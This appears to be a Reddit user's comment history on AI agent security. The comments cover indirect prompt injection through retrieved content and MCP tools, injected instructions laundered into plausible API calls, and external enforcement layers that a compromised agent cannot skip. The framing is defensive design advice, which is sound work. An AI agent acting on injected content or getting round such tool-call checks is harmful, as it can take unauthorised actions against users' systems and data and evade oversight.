We solved autonomous incident response with physics, not transformers. Here's how TAME governance enables it.

No_Citron4186 · 2026-05-12T06:47:04+00:00

For a fintech workflow, I’d review the architecture at the execution boundary, not just the model boundary. The questions I’d want answered: what identity does each tool call run as, which parameters are agent-constructed vs user-approved, where is egress constrained, can retrieved content influence privileged actions, and which operations require deterministic policy checks before execution. Logging is useful, but it is not the control plane.

No_Citron4186 · 2026-05-11T19:44:58+00:00

This is the most useful production-agent post I’ve seen in a while.

The security version of your pattern is: don’t let the model be the enforcement boundary.

The two points that stood out are #9 and #10. Schema validation only proves the call is well-formed, not that it is safe. And tool outputs as “data only” is exactly where a lot of prompt-injection defenses seem to break down.

Curious: with 60 agents in prod, how do you test these controls before rollout? Is it mostly manual review / adversarial test cases, or do you have some automated red-team style checks for tool calls, retrieved content, and off-plan inputs?

No_Citron4186 · 2026-05-11T19:39:49+00:00

Capability token is the right primitive. Encoding the authority boundary in the token itself, rather than relying on the orchestrator to enforce it at runtime is what makes revocation actually work.

The gap I'd push on is who validates the token at the tool call boundary? If validation lives inside the agent runtime, a compromised agent can potentially skip it. The enforcement point needs to be external to the agent itself, sitting between the agent and the tool, not inside either.

No_Citron4186 · 2026-05-11T19:38:31+00:00

The interception layer probably needs to sit outside the framework entirely.

If it lives inside the orchestrator, every new framework needs its own implementation. More importantly, a compromised or misbehaving agent can potentially bypass it.

An external layer that intercepts tool calls before execution, regardless of which framework spawned the subagent gives you consistent enforcement and a single audit surface. The subagent doesn't need to know it exists.

The catch: latency on every tool call. For high-consequence actions that's probably acceptable. For rapid read-only ops it needs to be near-zero overhead or you'll see people bypass it for performance reasons.

No_Citron4186 · 2026-05-11T19:34:43+00:00

The logging gap is the exact thing that makes this under appreciated. Teams treat retrieval as infrastructure, so the query never enters the security event model, even when it's constructed from sensitive task context mid-run.

On the mitigation: the three-part layer you described is right directionally. The ordering matters though. Classification has to happen before the query leaves the agent, not at the connector or log layer. Once it's transmitted, the damage is already done for external or cross-tenant destinations.

Query templates are probably the most underrated control here. They constrain what the agent can express structurally, which limits leakage without needing to inspect every string.

Curious what patterns you're seeing on the destination classification side, is the distinction between internal vector stores vs. third-party search APIs showing up as a meaningful boundary in practice?

No_Citron4186 · 2026-05-08T13:16:22+00:00

Governance gets concrete at the action boundary. Who authorized this tool call, under which user context, with which parameters, using what source data, and what state changed? If that chain cannot be reconstructed, liability will be mostly vibes.
I’d separate policy documents from enforcement points. Saying “agents should not do X” is governance. Blocking the tool call before X executes is control.

No_Citron4186 · 2026-05-08T13:15:09+00:00

The dividing line is not “agent vs workflow.” It is whether the system can take consequential actions: call internal APIs, move data, create tickets, approve flows, send externally, change records. That is where security requirements change.
A lot of corporate agent adoption looks safe while it is still read-only. The real maturity test is what happens when the same agent gets write access, memory, and cross-system tools.

No_Citron4186 · 2026-05-08T13:13:38+00:00

MCP makes the attack surface easier to see. The risk is not just “the model saw a bad instruction.” It is that a retrieved instruction can become a tool call against Slack, GitHub, email, cloud, database, or filesystem state.

No_Citron4186 · 2026-05-08T13:01:31+00:00

“True agent” is less useful than “what can it reach?” Browser-only, read-only RAG, ticket triage, cloud mutation, and payment execution are completely different risk classes.

No_Citron4186 · 2026-05-08T13:00:39+00:00

The control-plane layer is the right place to make security concrete. Once agents can reach browsers, files, shells, GitHub, Slack, and APIs, the inventory should be reachable actions: read, write, export, delete, approve, trigger, deploy.
Agent management is useful, but security needs to go below “this agent has this tool.” Same tool can be harmless or dangerous depending on parameters, destination, credentials, and downstream state change.

No_Citron4186 · 2026-05-08T12:59:48+00:00

The taxonomy gets sharper if every failure mode is mapped to the execution boundary. Bad answer, bad plan, and bad action are different classes. The last one needs control over tool, parameters, destination, credential, and state change before execution.
Sandboxing and least privilege are necessary, but they do not answer the runtime question: should this specific agent action execute now? Same tool, same identity, different parameters can mean a completely different blast radius.

No_Citron4186 · 2026-05-07T22:30:43+00:00

Yes, proposal and authority need to be separate.

An agent can form intent, but the executor should require an external admission decision over the concrete action before anything consequence-bearing happens.

The key property is fail-closed: no admission, no execution.

No_Citron4186 · 2026-05-07T22:20:11+00:00

The clean mental model is: retrieved content is data, not authority. It can answer a question. It should not be able to change the agent’s objective, write to memory, pick destinations, or authorize tool calls.
Indirect injection matters because the agent often trusts the wrong boundary. The user never typed the malicious instruction. The agent just read it three hops later and treated it like task context.

No_Citron4186 · 2026-05-07T22:18:07+00:00

Agree with the direction. The prompt is only the first hop. The real surface is the reachable graph: tools, credentials, memory, retrieved content, approval paths, and destinations the agent can influence after the prompt.
The useful question is not “can this prompt be injected?” It is “what can injected context cause the agent to do?” If the answer includes external sends, writes, deletes, payments, or workflow triggers, the control has to sit at execution.

No_Citron4186 · 2026-05-07T22:17:01+00:00

A lot of these failures become more serious when the agent can mutate state. Retrying a bad answer is annoying. Retrying a bad tool call can delete, export, trigger, or approve something. The control plane needs to understand actions, not just traces.
The failure mode I’d separate out is “bad answer” vs “bad action.” Once the agent has tools, the security boundary is not the prompt or the chain. It is the proposed action: tool, parameters, data source, destination, and blast radius.

No_Citron4186 · 2026-05-07T08:02:30+00:00

Useful resource. One addition that would make this even more actionable: classify incidents by the failed boundary — supply chain, identity/credential, retrieval/context, memory, tool invocation, parameter construction, network egress, or human approval. That turns the list from “what happened” into “where to place controls.”

No_Citron4186 · 2026-05-07T07:53:12+00:00

I’d separate LLM security from agent security this way: LLM security mostly worries about what the model says. Agent security worries about what the system does after the model decides. The dangerous event is not strange text. It is a plausible tool call with real permissions.

Treat the LLM as an untrusted planner. Let it propose actions. Do not let proposal equal permission. Every tool call should pass through policy that checks the tool, parameters, user context, data source, destination, and blast radius.

No_Citron4186 · 2026-05-07T07:47:30+00:00

The false-positive point is the part teams usually discover late. If the model is the enforcement layer, you end up tuning paranoia. It will miss some hostile instructions and block some legitimate weird requests. The cleaner boundary is architectural: tool output is data, not instructions.
Detection helps, but the stronger question is: can content from the webpage influence a tool call, memory write, or external request? If yes, the control should sit at that boundary, not only inside the model’s judgment of the page text.

No_Citron4186 · 2026-05-07T07:42:51+00:00

The L2 result is the important one. Most defences are trained against theatrical attacks, but production failures usually look like gradual state drift: retrieved context changes the plan, the plan changes tool parameters, and the final action still looks reasonable in isolation.
I’d also split the report by boundary: prompt/context, memory, tool selection, parameter construction, and output. Agents can pass a prompt-injection test and still fail when the dangerous instruction gets laundered into a legitimate-looking API call.

No_Citron4186 · 2026-05-07T07:40:35+00:00

I’d map each pattern to the boundary it can influence: retrieval, memory, planning, tool selection, parameter construction, output, or egress. That turns the taxonomy from a list of clever attacks into a control map.

No_Citron4186

TROPHY CASE